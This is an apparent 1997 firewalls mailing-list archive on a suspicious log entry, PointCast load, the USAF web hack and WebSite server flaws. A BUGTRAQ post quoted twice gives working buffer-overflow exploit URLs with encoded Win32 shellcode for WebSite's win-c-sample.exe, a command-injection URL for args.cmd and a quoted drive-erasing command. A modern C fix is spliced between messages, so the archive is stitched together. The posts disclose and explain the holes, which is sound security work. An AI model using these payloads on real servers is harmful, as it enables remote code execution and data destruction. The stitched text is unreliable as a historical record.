>if there is no O/S involved.
>
>Gentlemen, if this represents your understanding of operating systems and
>security, please contribute to alt.brush-sellers, not to firewalls.

Easy Bruce, this is only firewalls at Mr. Rogers' Neighborhood, not INFOSEC up at 20755. :) :) :)

___________________________
Bob McKisson
Director of Cooth & Decorum
Cypress Systems Corporation
Virginia Beach, VA 23451
(757) 425-4195 Voice
(757) 425-4196 FAX
(757) 442-0888 STU-III
pelicans@mindspring.com

I don't give them hell...I just give them the truth, and they think it's hell. - Harry Truman

From firewalls-owner Tue Jan 7 20:59:29 1997
Date: Tue, 07 Jan 1997 22:03:07 -0500
From: Steve
Reply-To: Steve@hon.com
Organization: sdg consulting
To: firewalls@GreatCircle.COM
Subject: Log entry
Hi,

Recently, I recorded a log entry that was _very_ unusual, and if someone could advise where I might seek information on deciphering entries such as the one below it would be much appreciated. A book, white paper, anything..

207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)"

I believe this connection also caused a Watson error. The only exe I am running is for my hit counter.

Thanks in advance
Steve
Steve@hon.com

From firewalls-owner Tue Jan 7 21:21:22 1997
Date: Wed, 08 Jan 1997 09:46:29 +0800
From: Henry Lim Chee Wee
Organization: National Computer Systems Pte Ltd
To: "Starkweather, Mike"
CC: firewalls@GreatCircle.COM
Subject: Re: Pointcast

Starkweather, Mike wrote:
>
> I am wondering how the members of this mail list have handled the
> flood of traffic generated by Pointcast. It has buried our firewall
> (Tis Toolkit) with the huge number of requests it generates. Their
> I-Server seems to help some but not as much as I had hoped.
>
> If this is the wrong place for this question please redirect me.
>
> Mike Starkweather
> Anheuser-Busch

This is not much of a firewall question, but...

If you are using I-Server from PointCast, then you should be able to put the server directly at the firewall, downloading PointCast's information at regular intervals during the day. That will constitute only one request on the firewall per download. Subsequently, all of your users should download the information from the I-Server and NOT directly from PointCast. However, remember to ask your users to upgrade their PointCast client to version 1.1.

For the finer details, you can check it out at:
http://www.pointcast.com/support/iserver/faqs/cliredir.html

--
"I-dare-you geysering forth with heartacious good will"
nitro
A Happy New Year To All !!!

From firewalls-owner Tue Jan 7 22:29:45 1997
From: "matrix"
Date: Wed, 8 Jan 1997 00:51:01 +0000
Subject: Re: USAF: how it was hacked

Matthew Patton wrote...
>
> Really quite anticlimactic. The infamous phf script was left active on
> the server and was how they got in. Root, the whole 9 yards.

Really? What are these statements based on? Could we please keep the rumors to a dull roar?

Thanks!

Stephen Manning, Special Agent
Computer Crime Investigator
Air Force Office of Special Investigations
Voice: (301) 981-5469 - Fax: (301) 981-3087

From firewalls-owner Tue Jan 7 22:44:07 1997
Date: Tue, 7 Jan 1997 23:59:49 -0600 (CST)
From: Ron DuFresne
To: Steve
cc: firewalls@GreatCircle.COM
Subject: Re: Log entry

On Tue, 7 Jan 1997, Steve wrote:
> Hi,
>
> Recently, I recorded a log entry that was _very_ unusual and if someone
> could advise where I might seek information on deciphering entries such
> as the one below it would be much appreciated. A book, white paper,
> anything..
>
> 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET
> /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D
> HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)"
>
> I believe this connection also caused a Watson error. The only exe I am
> running is for my hit counter.
>

From solar@ideal.ru Tue Jan 7 23:58:13 1997
Date: Mon, 6 Jan 1997 20:56:21 -0500
From: solar@ideal.ru
To: Multiple recipients of list BUGTRAQ
Resent-Date: Wed, 8 Jan 1997 00:04:23 -0600 (CST)
Resent-From: "R. DuFresne"
Resent-To: Ron DuFresne
Resent-Subject: Resent mail....

Hi!

Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first.

I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?).

The first thing that I noticed is about the scripts; they have the following lines in cgi-dos/args.cmd (and some others):

> rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
> rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
> rem erased!! Same goes for args and extra path info!!!

and then some lines like this:

> echo QUERY_STRING="%QUERY_STRING%"

Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be:

http://website.host/cgi-dos/args.cmd?"&any+dos+command"

Well, the stuff I just talked about might be too obvious; some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff.

There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there:

> char *argv[32]; // Max 32 command line args

That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow.

Here are the exploits (I split the long URLs into several lines); you can use any dos command in them (replace spaces with _'s):

-- WinNT (any version?):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

-- Win95 (the release version only, will crash others!):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request).

Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be as simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to a fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself; thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess.

Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish.

[snip]

Note that I had to avoid using some codes (which the server didn't allow me to use); that's why I do things like:

    db 68h          ; push imm32
    pop esi         ; \
    pop eax         ; | - the value being pushed
    jmp esi         ; /
    call esp

instead of:

    call $+5        ; would contain zeroes
    pop esi

Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way.

As for the holes -- the fix is obvious: just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me ;-). BTW, they didn't even have the quotes in the scripts I mentioned above, in some earlier versions.

Signed,
Solar Designer

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
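The forwarded post pins the hole on SplitArgs() filling a 32-entry argv[] with no bounds check. As an added example, not part of any message in this thread and not the WebSite sources (which are not on the page), here is what a bounds-checked splitter for that argv[] looks like; the function names, the '+'-separated query convention and the sample queries are assumptions.

```c
/* Added example: a bounds-checked replacement for the kind of unchecked
 * SplitArgs() the BUGTRAQ post describes.  WebSite's source is not on the
 * page, so the function names, the '+'-separated query convention and the
 * sample queries are assumptions, not the product's code. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 32        /* the "char *argv[32]" quoted in the post */
#define MAX_QUERY 4096     /* assumed cap on the query string we accept */

enum split_status {
    SPLIT_OK = 0,
    SPLIT_TOO_MANY_ARGS,   /* more than MAX_ARGS fields: refused, not truncated */
    SPLIT_BAD_INPUT        /* NULL pointer */
};

/* Split "a+b+c" in place ('+' is the CGI argument separator) into at
 * most MAX_ARGS pointers.  The bound is checked *before* every store, so
 * a query with 33 or more fields returns SPLIT_TOO_MANY_ARGS instead of
 * writing past argv[], which is the defect the exploit above relies on.
 * Empty fields (a leading '+' or "++") count as arguments; a trailing '+'
 * adds no field. */
enum split_status split_args_bounded(char *query, char *argv[MAX_ARGS], int *argc)
{
    int n = 0;
    char *p = query;

    if (query == NULL || argv == NULL || argc == NULL)
        return SPLIT_BAD_INPUT;
    *argc = 0;

    while (*p != '\0') {
        if (n >= MAX_ARGS)
            return SPLIT_TOO_MANY_ARGS;   /* bound enforced before the write */
        argv[n++] = p;
        p = strchr(p, '+');
        if (p == NULL)
            break;
        *p++ = '\0';                      /* terminate field, resume after '+' */
    }
    *argc = n;
    return SPLIT_OK;
}

/* Count the fields of a read-only query string, or return -1 if it is
 * NULL, over-long, or would overflow argv[].  This is the check a CGI
 * program can run before touching the arguments at all. */
int count_query_args(const char *query)
{
    char buf[MAX_QUERY];
    char *argv[MAX_ARGS];
    int argc;

    if (query == NULL || strlen(query) >= sizeof buf)
        return -1;
    memcpy(buf, query, strlen(query) + 1);
    if (split_args_bounded(buf, argv, &argc) != SPLIT_OK)
        return -1;
    return argc;
}

/* Build a constructed query with exactly `fields` one-letter fields joined
 * by '+', e.g. fields == 3 gives "a+a+a".  Returns 0, or -1 if buf is too
 * small or fields < 1. */
int make_query(int fields, char *buf, size_t buflen)
{
    int i;

    if (buf == NULL || fields < 1 || (size_t)fields * 2 > buflen)
        return -1;
    for (i = 0; i < fields; i++) {
        buf[2 * i] = 'a';
        buf[2 * i + 1] = (i + 1 < fields) ? '+' : '\0';
    }
    return 0;
}

/* Generate a query with `fields` fields and report how the checked
 * splitter treats it: the field count, or -1 when it is refused. */
int count_generated_query(int fields)
{
    char buf[MAX_QUERY];

    if (make_query(fields, buf, sizeof buf) != 0)
        return -1;
    return count_query_args(buf);
}

int main(void)
{
    /* Constructed samples: a benign query, a leading-'+' prefix shaped like
     * the log entry above, and the 32/33 boundary of the quoted argv[32]. */
    printf("\"alpha+beta+gamma\" -> %d args\n", count_query_args("alpha+beta+gamma"));
    printf("\"+-+-+-h\"          -> %d args\n", count_query_args("+-+-+-h"));
    printf("32 fields          -> %d\n", count_generated_query(32));
    printf("33 fields          -> %d (refused)\n", count_generated_query(33));
    return 0;
}
```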
From firewalls-owner Tue Jan 7 23:31:03 1997
Date: Wed, 08 Jan 1997 02:18:57 -0500
From: Steve Gallipeau
Reply-To: Steve@hon.com
Organization: sdg consulting
To: firewalls@GreatCircle.COM
Subject: Re: Log Entry

All,

Thank you for the many responses.. much faster than even CERT!

As it turns out, I had been corresponding with someone regarding the security of my site and had asked him to take a look at it. Although in this case a false alarm, it sure woke me up to the fact that I need to make things a lot more secure.

Thanks again.

Steve
Steve@hon.com

From firewalls-owner Wed Jan 8 00:04:17 1997
Date: Wed, 08 Jan 1997 16:08:38 -0800
From: Damien Miller
To: Steve@hon.com, firewalls@greatcircle.com
Subject: Re: Log entry

Steve wrote:
>
> Hi,
>
> Recently, I recorded a log entry that was _very_ unusual and if someone
> could advise where I might seek information on deciphering entries such
> as the one below it would be much appreciated. A book, white paper,
> anything..
>
> 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET
> /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D
> HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)"
>
> I believe this connection also caused a Watson error. The only exe I am
> running is for my hit counter.

This is an attempt to exploit a buffer overrun in your (WebSite) server. Below is a post made to BUGTRAQ earlier this week. I expect to see more NT buffer overrun exploits now that someone has published shellcodes.
Yet more proof that security through obscurity is insufficient.

Regards,
Damien Miller

--
/--------------------------------------------------------------------------\
| Damien Miller --- Technical Consultant        Vitnet Pte Ltd (Singapore) |
| "Show me a sane man and I will cure him for you" - C. G Jung (1875-1961) |
\--------------------------------------------------------------------------/

---------- Begin forwarded message
Subject:
Date: Mon, 6 Jan 1997 20:56:21 -0500
From: solar@ideal.ru
To: Multiple recipients of list BUGTRAQ

Hi!

Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first.

I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?).

The first thing that I noticed is about the scripts; they have the following lines in cgi-dos/args.cmd (and some others):

> rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
> rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
> rem erased!! Same goes for args and extra path info!!!

and then some lines like this:

> echo QUERY_STRING="%QUERY_STRING%"

Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be:

http://website.host/cgi-dos/args.cmd?"&any+dos+command"

Well, the stuff I just talked about might be too obvious; some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff.

There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there:

> char *argv[32]; // Max 32 command line args

That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow.

Here are the exploits (I split the long URLs into several lines); you can use any dos command in them (replace spaces with _'s):

-- WinNT (any version?):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

-- Win95 (the release version only, will crash others!):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request).

Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be as simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to a fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself; thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess.

Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish.

[snip]

Note that I had to avoid using some codes (which the server didn't allow me to use); that's why I do things like:

    db 68h          ; push imm32
    pop esi         ; \
    pop eax         ; | - the value being pushed
    jmp esi         ; /
    call esp

instead of:

    call $+5        ; would contain zeroes
    pop esi

Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way.

As for the holes -- the fix is obvious: just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me ;-). BTW, they didn't even have the quotes in the scripts I mentioned above, in some earlier versions.

Signed,
Solar Designer
----------

From firewalls-owner Wed Jan 8 00:48:36 1997
From: ricard.scorpion@bcn.servicom.es
To: firewalls@greatcircle.com
Subject: Fw: Altavista firewall help
Date: Wed, 9 Oct 1996 09:27:59 +0100

----------
> From: Ricard Vilata i Salvanera
> To: firewalls-owner@GreatCircle.com
> Subject: Altavista firewall help
> Date: Tuesday, 8 October 1996 5:50
>
> Hi,
>
> I'm evaluating AltaVista Firewall to implement our company's Internet
> security. I want to use two different levels of firewalling: IP filtering
> and application proxy. Our platform will be Windows NT. I would like to
> use a DMZ implementation with AltaVista Firewall and MS Proxy Server. Can
> anybody tell me if I'm wrong? I don't know anything about AltaVista
> performance for more than 50 concurrent users. Do you have any product
> comparison between AltaVista and Firewall-1?
>
> Please, can anybody help me with more data or experience?
>
> --
> Ricard Vilata
> Business Area Manager
> ricard.scorpion@bcn.servicom.es
> _________________________________

From firewalls-owner Wed Jan 8 01:34:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA02927 for firewalls-outgoing; Wed, 8 Jan 1997 01:17:04 -0800 (PST) Received: from kilkenny.tip.net (kilkenny.tip.net [192.36.73.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA02893 for ; Wed, 8 Jan 1997 01:16:45 -0800 (PST) Received: from ns.berendsen.com ([194.19.168.20]) by kilkenny.tip.net (8.6.12/8.6.12) with ESMTP id KAA18493 for ; Wed, 8 Jan 1997 10:16:07 +0100 Received: from ns1 (ns1.sbi.net [194.19.168.33]) by ns.berendsen.com (8.7.3/8.7.3) with SMTP id KAA13830 for ; Wed, 8 Jan 1997 10:15:30 +0100 (MET) Message-ID: <32D365DE.41EB@sbi.net> Date: Wed, 08 Jan 1997 10:16:14 +0100 From: michael dreves Organization: Berendsen Components X-Mailer: Mozilla 3.01Gold (X11; I; SunOS 5.5.1 sun4m) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V6 #8 References: <199701080648.WAA21235@miles.greatcircle.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi sweet Sus,

here comes Flemming's new e-mail....there are actually two addresses we should try:

drc@drc.baku.az (Danish Refugee Council.
fdr@drc.baku.az (presumably Flemming)

kh.
--
michael dreves (MD113-RIPE), System Consultant
Berendsen Data, Phone +45-39577300, Fax +45-39577302
Key fingerprint = 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D

From firewalls-owner Wed Jan 8 01:44:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA03091 for firewalls-outgoing; Wed, 8 Jan 1997 01:18:51 -0800 (PST) Received: from mhaaf.inhouse.compuserve.com (mhaaf.inhouse.compuserve.com [149.174.64.79]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA02989 for ; Wed, 8 Jan 1997 01:18:12 -0800 (PST) Received: from notes2.compuserve.com (cserve-aagw2.notes.compuserve.com [149.174.221.199]) by mhaaf.inhouse.compuserve.com (8.6.9/8.6.12) with SMTP id FAA08289.; Wed, 8 Jan 1997 05:43:01 -0500 Received: by notes2.compuserve.com (IBM OS/2 SENDMAIL VERSION 1.3.17/2.0) id AA3746; Wed, 08 Jan 97 04:17:50 -0500 Message-Id: <9701080917.AA3746@notes2.compuserve.com> Received: by External Gateway (Lotus Notes Mail Gateway for SMTP V1.1) id 33EB2F0BAA9F00004125641900310EB1; Wed, 8 Jan 97 04:17:41 To: darren cromer Cc: "'xavier fauquet'" , "'les @tracker.demon.co.uk'" , "'firewalls @greatcircle.com'" From: "massimo.cotrozzi" Date: 8 Jan 97 10:04:10 Subject: RE: Using Remote Workstation as Hole?? Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>
>On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
>>Could someone point me to a site explaining to me what
>>Winframe is?
>
>I think ... http://www.cytrix.com ?
>
>Winframe is a remote processing system which allows PC clients to run server
>applications on a Windows system rather than using their own processing
>power.
>
>I think.
>
>...Les...
>

One very nice hole of poor (common) installation of Win Frame is that if you let people use browsers (say nt ie 2) on the server side of the connection they can just "browse" an executable (say winfile) and ...
voilà, a window pops up browsing the server from the client .... (This one is just a few hits away on your keyboard)

Massimo Cotrozzi

Arthur Andersen - Computer Risk Management
Computer Security Senior Consultant
Via della Moscova 3, 20121 Milano
Tel. ++ 39-2-290371

From firewalls-owner Wed Jan 8 02:59:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA10986 for firewalls-outgoing; Wed, 8 Jan 1997 02:51:50 -0800 (PST) Received: from ram-exch-ns1.ramstein (ram-exch-ns1.ramstein.af.mil [132.25.130.19]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA10979 for ; Wed, 8 Jan 1997 02:51:38 -0800 (PST) Received: by ram-exch-ns1.ramstein with Microsoft Exchange (IMC 4.0.837.3) id <01BBFD5A.65422BE0@ram-exch-ns1.ramstein>; Wed, 8 Jan 1997 11:52:17 +0100 Message-ID: From: Franke Albert 2 Lt USAFE CSS/SCBS To: "'firewalls@GreatCircle.com'" Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 11:52:29 +0100 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I am responsible for securing (as well as I can) a DEC Alpha running Windows NT 4.0 and Internet Information Server as our WWW Server. It is sitting as a node on our LAN and everyone in the world can access it. I want a program that I can run on it that will allow/disallow blocks of IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but not as necessary) it to keep detailed logs. I have heard of O'Reilly's WebSite, but I don't know if this will do. I do not have funding for an expensive firewall machine, and it is impractical to add routers into our LAN. Please help if you have any suggestions. Thanks.

albert.franke@ramstein.af.mil
Albert E.
Franke, 2Lt, USAF
OIC, USAFE Web Tech Support
480-7905

From firewalls-owner Wed Jan 8 03:14:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA11282 for firewalls-outgoing; Wed, 8 Jan 1997 03:08:29 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA11274 for ; Wed, 8 Jan 1997 03:08:19 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id fa137831 for ; Wed, 8 Jan 1997 12:07:48 +0100 Received: by ppp52.sbbs.se with Microsoft Mail id <01BBFD5C.41D55860@ppp52.sbbs.se>; Wed, 8 Jan 1997 12:05:36 +0100 Message-ID: <01BBFD5C.41D55860@ppp52.sbbs.se> From: Sebastian Stache To: "'patton@sysnet.net'" Cc: "'Firewalls (inet/GreatCircle)'" Subject: RE: Air Force Web Site Hacked Date: Wed, 8 Jan 1997 12:05:34 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I fully agree. At the same time I'm relieved, since it means we're not experiencing anything magical.

----------
From: Matthew Patton[SMTP:patton@sysnet.net]
Sent: 5 January 1997 00:50
To: Sebastian Stache
Subject: Re: Air Force Web Site Hacked

>Or are there html
>specific inherent weaknesses not necessarily in the protocol but in the ancient and poor setups used by most casual webadmins.

Not 1 week before the incident I urged ASSIST (the military pseudo equiv of CERT) to start beating the drum about pathetically insecure websites. People routinely leave test-cgi with all its niceties left available. Did they have FTP? Probably. It is appalling how little the 'network professionals' really know about their systems, host and network security. I thought the Pentagon could command better. I'm reminded daily that this isn't so, whether it be military folk or contractors.
From firewalls-owner Wed Jan 8 04:14:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA13734 for firewalls-outgoing; Wed, 8 Jan 1997 03:53:53 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA13710 for ; Wed, 8 Jan 1997 03:53:25 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id oa137840 for ; Wed, 8 Jan 1997 12:52:59 +0100 Received: by ppp52.sbbs.se with Microsoft Mail id <01BBFD62.90C9FEC0@ppp52.sbbs.se>; Wed, 8 Jan 1997 12:50:46 +0100 Message-ID: <01BBFD62.90C9FEC0@ppp52.sbbs.se> From: Sebastian Stache To: "'Firewalls (inet/GreatCircle)'" Cc: "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'" Subject: Re: Re: NCSA != NCSC Date: Wed, 8 Jan 1997 12:50:35 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Wilner informed me that:

> Everything except boot-up depends upon the O/S. Nothing is below the "O/S
> layer," nor does one speak of such a layer unless one intends "application as well as
> layer" and doesn't know an application from an O/S, nor can a single byte be
> sent or retrieved over a device (networked or otherwise) unless an O/S is
> relied upon, nor can a single access to memory, disk, or what-have-you be

and more.

This is all quite surprising to me. Even though I like to do so when I'm moody, it's not common practice to refer to MS Windows 3 as an application. Most people would call it an (however able or not) Operating System. And yet, Windows 3 is in every way running on top of DOS. With Windows 95, Microsoft has tried to make it less apparent that DOS is still required. They even remap the video adapter's base address during boot, so as to hide the familiar DOS black-screen.
In fact, Microsoft in some ways tries to convince their customers that the windowed environment is nothing but an alternate shell (GUI) to the operating system. To this end, you can choose to start WITHOUT activating the "GUI" by putting a statement "BootGUI=0" in a configuration file. This will render you a text-only shell which looks very much like a DOS-prompt. No wonder, it *is* a DOS-prompt (in almost every detail equivalent to DOS version 7), and nothing else. You don't have long-filename support, you don't have any network facilities, you can't even use your printers. Unless you type "win", to start Windows 95. As a matter of interest, this is exactly what happens if you change the "BootGUI=0" to "BootGUI=1" - "win" is inserted into the command queue after all other statements in Autoexec.bat have been executed.

Now suppose I wanted to use Drivespace, an MS technique to compress harddisks on the fly. Or even better, Stacker, a 3rd-party equivalent. Either of these would install themselves BELOW Windows 95 (and even more interestingly, in some respects even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). To Windows 95 (and to DOS), the compression activities would be transparent, ie Windows would not *know* about them. Which of course is the whole point.

I don't think there's any point in mentioning utilities that halt the computer when a virus is detected, or when battery status is low, or when the Debug-mode button is pressed, or when a source-routed packet arrives.
From firewalls-owner Wed Jan 8 04:59:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA16306 for firewalls-outgoing; Wed, 8 Jan 1997 04:49:35 -0800 (PST) Received: from lab58-12.ims.advantis.com (pony-express.ims.advantis.com [192.231.11.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA16289 for ; Wed, 8 Jan 1997 04:49:19 -0800 (PST) Received: (from hfarkas@localhost) by lab58-12.ims.advantis.com (8.6.9/95.10.11) id HAA21439; Wed, 8 Jan 1997 07:46:01 -0500 Received: from d5664655.ims.advantis.com(164.120.51.69) by lab58_12 via smap (V1.3) id sma028861; Wed Jan 8 07:45:55 1997 Received: by gandalf.ims.advantis.com (8.6.9/950921) id HAA27475; Wed, 8 Jan 1997 07:56:33 -0500 Date: Wed, 8 Jan 1997 07:56:33 -0500 (EST) From: "Henry W. Farkas" To: "Starkweather, Mike" cc: "'firewalls@GreatCircle.COM'" Subject: Re: Pointcast In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Tue, 7 Jan 1997, Starkweather, Mike wrote:

> I am wondering how the members of this mail list have handled the
> flood of traffic generated by Pointcast. It has buried our firewall
> (Tis Toolkit) with the huge number of requests it generates. Their
> I-Server seems to help some but not as much as I had hoped.

For starters, you might ask everyone to update on a limited schedule, customized schedule, or manually: that is, only when the update button is pressed.

